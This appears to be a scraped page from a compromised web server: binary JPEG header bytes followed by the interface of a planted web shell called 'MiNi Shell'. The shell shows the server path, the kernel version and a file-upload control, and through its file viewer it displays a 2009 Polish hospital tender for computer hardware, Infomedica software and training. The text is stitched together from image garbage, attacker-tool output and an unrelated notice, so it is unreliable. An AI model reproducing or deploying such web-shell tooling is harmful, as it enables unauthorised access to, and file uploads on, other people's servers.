JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090218/33216-N-2009.html

<p class="kh_header"><b>Lwówek Śląski: dostawa oprogramowania i urządzeń komputerowych oraz wdrożenie oprogramowania i szkolenie użytkowników.</b><br>
<b>Numer ogłoszenia: 33216 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Niepubliczny Zakład Opieki Zdrowotnej Powiatowe Centrum Zdrowia Sp. z o.o. , ul. Morcinka 7, 59-600 Lwówek Śląski, woj. dolnośląskie, tel. 0-75 782 01 04, faks 0-75 782 44 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitallwowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny zakład opieki zdrowotnej osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa oprogramowania i urządzeń komputerowych oraz wdrożenie oprogramowania i szkolenie użytkowników..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa oprogramowania i urządzeń komputerowych oraz wdrożenie oprogramowania i szkolenie użytkowników dla Niepublicznego Zakładu Opieki Zdrowotnej Powiatowe Centrum Zdrowia Sp. z o. o. z siedzibą w Lwówku Śląskim przy ul. Morcinka 7. 
serwer - szt. 1,                                                          
Windows Serwer 2008 lub równoważny - szt. 1,                                 
komputer z Monitorem  LCD 17 lub większy - szt. 10,  
system operacyjny Win XP HE SP3 PL  lub równoważny - szt. 10
Serwer: 1 szt.
Serwer 2 procesorowy
Procesor: 2 x serwerowe procesory taktowane co najmniej  zegarem 2.66GHz/1333 MHz Quad Core z FSB (EM64T)
Procesory (std./max): 2;L2 cache (standard):2x 12MB;
Pamięć (typ, std/max): 16GB PC2-5300 667 MHz ECC DDR2- SDRAM DIMMs ,
8x2GB/48GB ,12 slotów na pamięc (4 wolnych) 
HDD:6x146GB 15K ; max 6 dysków sas( hot-swap) 3,5
kontroler: zintegrowany Adaptec AIC-9580W dwukanałowy sas ,zintegrowany
ServeRAID 8k umożliwiający sprzętowy RAID-0 ,1&10,5
karta sieciowa: zintegrowana 2xGigabit Ethernet Broadcom 5708
PCI: 4sloty; 2x PCI-Express x8 lub 2x PCI-X 64bit/133MHz full lenght
(zastosowana karta riser decyduje o rodzaju slotu) oraz 2x PCI-Express x8 lowprofile
Porty: 6xUSB(2x przód, 4x tył); 1x serial,1 x monitor,2x RJ-45,1 port zarządzania
Zasilanie:2x835W(zasilacz redundantny)
Spełniający normy Energy Star  
Komputery - stacje robocze: szt. 10
Płyta Główna z portem LAN i VGA,
Procesor: dwurdzeniowy taktowany zegarem co najmniej 2,4 GHz,
Pamiec DDR-2 ,
HDD 160GB, 
Klawiatura + mysz - usb lub ps2, 
Nagrywarka DVD,
MS Windows XP Home Edition  SP3 PL,
Obudowa ATX +  ZASILACZ ATX, 
Monitor LCD 17 lub większy,
Spełniające normy Energy Star 
Oprogramowanie INFOMEDICA  ABG-licencje (rozbudowa i aktualizacja oprogramowania Infomedica będącego w posiadaniu Zamawiającego) 
Moduł Finansowo Księgowy - 2                   
Moduł Rachunek Kosztów - 1                       
Moduł Wycena kosztów Normatywnych - 1   
Moduł Środki Trwałe - 1                                  
Moduł Gospodarka Materiałowa - 1                 
Moduł Kasa - 1                                                
Moduł Rejestr Sprzedaży - 1                            
Moduł Kadry - 1                                              
Moduł Płace - 1                                               
Apteka -1
Wdrożenie części administracyjnej  
Moduł Finansowo Księgowy -ilość dni wdrożenia 4                     
Moduł Rachunek Kosztów -ilość dni wdrożenia  3                        
Moduł Wycena kosztów Normatywnych -ilość dni wdrożenia  2    
Moduł Środki Trwałe - ilość dni wdrożenia 3                                  
Moduł Gospodarka Materiałowa -ilość dni wdrożenia  3                   
Moduł Kasa -ilość dni wdrożenia  1                                                 
Moduł Rejestr Sprzedaży -ilość dni wdrożenia  2                            
Moduł Kadry -ilość dni wdrożenia  8                                                
Moduł Płace - ilość dni wdrożenia 10                                               
Apteka - ilość dni wdrożenia 6                                                        
Instalacja systemów na serwerze -ilość dni wdrożenia  3
Licencje modułów szpitalnych i administracyjnych
Ruch Chorych - 6                                        
Zamówienia Publiczne - 1                            
Administrator - 1                                          
Zlecenia - 5                                              
Blok Operacyjny - 1                                   
Kalkulacja kosztów Leczenia - 1                
Budżetowanie - 1                                          
Apteczka Oddziałowa -7                              
Pracownia Diagnostyczna - 1
Instalacje i konfiguracje
Instalacja na serwerze motoru bazy danych. Platformy systemowej 
(osobodni)-2   
Instalacja na stacjach roboczych oprogramowania aplikacyjnego 
(osobodni) - 4
Konfiguracja systemu oraz połączenie danych z systemu rozliczeń i administracji (osobodni) - 10
Konfiguracja aplikacji (osobodni) - 4
Szkolenie użytkowników (osobodni) - 12
Szkolenia administratorów(osobodni) - 2
Umowa serwisu oprogramowania - 12 mies.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.78.10.00-6, 48.62.00.00-0, 30.20.00.00-1, 72.26.30.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
a) posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień; 
b) posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 
c) znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
d) niepodlegający wykluczeniu z postępowania o udzielenie zamówienia w myśl art. 24 oraz spełniający warunki art. 22 Pzp.
2. Wykaz oświadczeń i dokumentów 
1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających  ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  
3) Oświadczenie Wykonawcy o nie podleganiu wykluczeniu w myśl art. 24 i spełnianiu warunków art. 22 ustawy Pzp (załącznik nr 2 do SIWZ), 
4) wykaz osób, które będą wykonywać zamówienie, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, wykształcenia, stażu pracy, a także zakresu wykonywanych przez nich czynności. Podane informacje należy poprzeć odpowiednią dokumentacją (wykaz wraz z kserokopiami dokumentów poświadczających wymagane kwalifikacje i/lub uprawnienia). Zamawiający wymaga, aby wykonawca dysponował: 
- dwiema osobami z wyższym wykształceniem technicznym i 3 letnim stażem w dziedzinie wdrożeń Systemów Informatycznych. 
- dwiema osobami w zakresie zarządzania oferowanymi bazami danych i systemami operacyjnymi posiadających odpowiednie certyfikaty (np.: Oracle, Gupta, Microsoft),
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana na podstawie żądanych  oświadczeń i dokumentów, wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę (zał. nr 1)
A.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę (zał. nr 2)
A.3) Wzór umowy (zał. nr 3)
A.4) Oświadczenie wykonawcy (zał. nr 4)

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty: 
B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
B.3) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych.
B.4) oświadczenia wykonawcy w zakresie opisanym w pkt. V. 1.1, 1.2, 1.3, 1.4

C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
C.1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że dostawy lub usługi te zostały wykonane należycie.
C.2) wykaz osób, które będą wykonywać zamówienie, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, wykształcenia, stażu pracy, a także zakresu wykonywanych przez nich czynności. Podane informacje należy poprzeć odpowiednią dokumentacją (wykaz wraz z kserokopiami dokumentów poświadczających wymagane kwalifikacje i/lub uprawnienia). Zamawiający wymaga, aby wykonawca dysponował: 
- dwiema osobami z wyższym wykształceniem technicznym i 3 letnim stażem w dziedzinie wdrożeń Systemów Informatycznych. 
- dwiema osobami w zakresie zarządzania oferowanymi bazami danych i systemami operacyjnymi posiadających odpowiednie certyfikaty (np.: Oracle, Gupta, Microsoft),.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpitallwowek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Niepubliczny Zakład Opieki Zdrowotnej Powiatowe Centrum Zdrowia Sp. z o. o.
ul. Morcinka 7, 59-600 Lwówek Śląski, opłata za SIWZ  25,00 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 12:00, miejsce: Niepubliczny Zakład Opieki Zdrowotnej Powiatowe Centrum Zdrowia Sp. z o. o.
ul. Morcinka 7 
59-600 Lwówek Śląski
Pokój nr 310 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com